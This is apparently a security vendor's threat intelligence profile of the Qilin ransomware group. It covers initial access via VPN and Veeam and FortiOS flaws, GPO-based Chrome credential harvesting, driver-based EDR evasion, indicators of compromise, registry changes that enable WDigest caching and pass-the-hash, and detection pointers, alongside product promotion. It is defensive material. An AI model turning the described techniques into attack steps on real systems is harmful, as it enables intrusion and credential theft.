Intruvent Technologies
Contact us
Critical Ransomware-as-a-Service Active 🇷🇺 Russia (suspected) TLP:CLEAR

Qilin Ransomware

Ransomware-as-a-Service with Chrome Credential Harvesting & BYOVD Capabilities

Also known as: Agenda

Qilin has emerged as the #1 ransomware threat to US State, Local, Tribal, and Territorial (SLTT) organizations in Q2 2025, responsible for 24% of reported incidents. With 792+ confirmed attacks, Qilin employs unique GPO-based Chrome credential harvesting and BYOVD EDR evasion.

792+
Confirmed Victims
24%
SLTT Incidents (Q2 2025)
18+
Days Avg Dwell Time
70+
Victims in Single Month
1

Executive Summary

CRITICAL THREAT LEVEL

Qilin employs a unique GPO-based Chrome credential harvesting technique that steals browser passwords across entire domains. This means a Qilin breach requires not only AD password resets but also credential changes for all third-party sites saved in Chrome browsers enterprise-wide.

Qilin (originally "Agenda") is a Ransomware-as-a-Service (RaaS) operation first observed in July 2022. Initially written in Golang, the ransomware was rewritten in Rust by late 2023, gaining cross-platform capabilities including VMware ESXi targeting. The operation runs a double-extortion model with a dedicated leak site.

Qilin affiliates typically gain initial access via compromised VPN credentials (often lacking MFA), exploitation of Veeam Backup (CVE-2023-27532), or phishing campaigns targeting MSP environments. The group absorbed many affiliates from the defunct RansomHub operation in April 2025.

Key Characteristics

RaaS model (affiliate-driven)
Rust-based (cross-platform)
VMware ESXi targeting
Chrome credential harvesting via GPO
BYOVD for EDR evasion (dark.sys)
Veeam backup targeting
Double extortion
18+ day average dwell time
Russian-speaking operators
792+ confirmed victims
2

MITRE ATT&CK Mapping

Qilin affiliates employ a comprehensive range of techniques across the attack lifecycle:

T1078 Valid Accounts

Compromised VPN credentials, often from dark web leaks

T1190 Exploit Public-Facing App

Veeam CVE-2023-27532, FortiGate CVEs

T1484.001 Domain Policy Modification

GPO-based Chrome stealer and ransomware deployment

T1555.003 Credentials from Web Browsers

Chrome password extraction via PowerShell

T1003.001 LSASS Memory

Mimikatz (Themida-packed) credential dumping

T1562.001 Disable Security Tools

EDR termination via kernel driver (BYOVD)

T1537 Transfer to Cloud Account

Cyberduck exfiltration to Backblaze

T1486 Data Encrypted for Impact

AES-256 + RSA-2048 encryption

Unique Attack: Chrome Credential Harvesting via GPO

After compromising a domain controller, Qilin modifies the default domain GPO to add a logon script that extracts Chrome passwords. The script creates SQLite database files and logs in SYSVOL, named after each machine's hostname. This GPO typically remains active for 3+ days, silently harvesting credentials each time users log in. If detected, all users must change passwords for every site saved in Chrome browsers, in addition to AD password resets.

3

Hunt Modules

The full threat hunting guide includes 10 detailed hunt modules with KQL, Splunk, and Sigma queries. Key modules include:

1 Initial Access - VPN & Phishing Detection
30 min Critical

Identify unauthorized VPN access and MSP-targeted phishing campaigns. Check for VPN logins without MFA challenge, logins during unusual hours, and access from hosting provider IPs.

2 Veeam & Backup Infrastructure Targeting
30 min Critical

Detect exploitation of Veeam backup infrastructure for credential theft (CVE-2023-27532) and backup destruction. Any unauthorized access to Veeam databases or deletion of backup jobs indicates imminent ransomware deployment.

3 Chrome Credential Harvesting via GPO
45 min Critical

Detect Qilin's signature GPO-based Chrome password stealing technique. Look for GPO logon script modifications, Chrome credential access patterns, and suspicious .db/.log files in SYSVOL.

5 BYOVD EDR Evasion (dark.sys)
30 min Critical

Detect Bring Your Own Vulnerable Driver attacks used to disable EDR. Monitor for dark.sys, eskle.sys, and other vulnerable driver loading. BYOVD activity indicates imminent ransomware deployment.

9 Pre-Encryption Indicators
30 min Critical

Detect final-stage preparation before ransomware execution: critical service termination (SQL, Exchange, Veeam, VMware), shadow copy deletion, event log clearing, and w.exe deployment to C:\temp.

Download Full Threat Hunting Guide

Complete 10-module hunting guide with KQL, Splunk, and Sigma detection rules.

Download PDF — Free
4

Indicators of Compromise

File Indicators

Name Type Context
w.exe Ransomware Primary payload (C:\temp\)
encryptor_1.exe / encryptor_2.exe Ransomware Dual encryptor deployment
dark.sys Driver BYOVD EDR killer
HRSword.exe Tool Defense evasion
pars.vbs Script SMTP exfiltration (Cyrillic encoding)
logon.bat Script GPO Chrome harvester launcher

Exploited Vulnerabilities

CVE Product Usage
CVE-2023-27532 Veeam Backup & Replication Credential extraction
CVE-2024-21762 Fortinet FortiOS Initial access (SSL VPN)
CVE-2024-55591 Fortinet FortiOS Initial access (SSL VPN)

Registry Modifications

Key Value Purpose
HKLM\...\WDigest\UseLogonCredential 1 Enable WDigest caching
HKLM\...\Terminal Server\fDenyTSConnections 0 Enable RDP
HKLM\...\Lsa\DisableRestrictedAdmin 0 Enable pass-the-hash
5

Detection & Response

Key Detection Opportunities

GPO-Based Attacks

  • GPO logon script modifications (SYSVOL)
  • Chrome credential database access by non-Chrome processes
  • Suspicious .db/.log files in SYSVOL
  • PowerShell with SQLite/Chrome references

BYOVD Activity

  • dark.sys or eskle.sys driver loading
  • Unsigned driver installation
  • EDR process termination attempts
  • 2stX.exe, Or2.exe, HRSword.exe execution

Backup Targeting

  • Veeam credential database access
  • Backup job deletion/modification
  • PowerShell Veeam cmdlet abuse
  • TCP 9401 anomalous connections

Pre-Encryption

  • Shadow copy deletion (vssadmin, wmic)
  • Critical service termination
  • w.exe in C:\temp directory
  • Scheduled task creation for run.bat

Available Detection Rules

The full PDF includes custom Sigma detection rules for:

  • Qilin Chrome Credential Harvesting via GPO - Detects Chrome credential access from GPO logon scripts
  • Qilin BYOVD EDR Killer - Detects loading of vulnerable drivers used for EDR evasion
  • WDigest UseLogonCredential Modification - Detects enabling of WDigest credential caching

Track Qilin with BRACE

BRACE delivers monthly sector-specific threat intelligence covering Qilin and ransomware activity, including:

  • Qilin campaign analysis and victim tracking
  • Detection rules for credential harvesting and BYOVD
  • MITRE ATT&CK mappings for ransomware TTPs
  • Sector-specific threat hunting playbooks
  • IOCs and behavioral indicators
Learn More About BRACE Request Demo

Download Complete Qilin Threat Hunting Guide

Get the full 10-module guide including all KQL queries, Sigma rules, and IOCs.

Download PDF — Free

Related Intelligence

Critical CVE Analysis

CVE-2024-55591: FortiOS Auth Bypass

Qilin affiliates exploit this vulnerability for initial access to FortiGate firewalls.

View Analysis →
Critical Threat Actor

Scattered Spider

Another financially-motivated group with sophisticated social engineering and Qilin affiliation.

View Profile →
High Threat Actor

SafePay Ransomware

Emerging RaaS operation with similar double-extortion tactics.

View Profile →

Stay Ahead of Qilin

BRACE delivers monthly threat intelligence on Qilin and 175+ other threat groups with detection rules and hunting playbooks for your sector.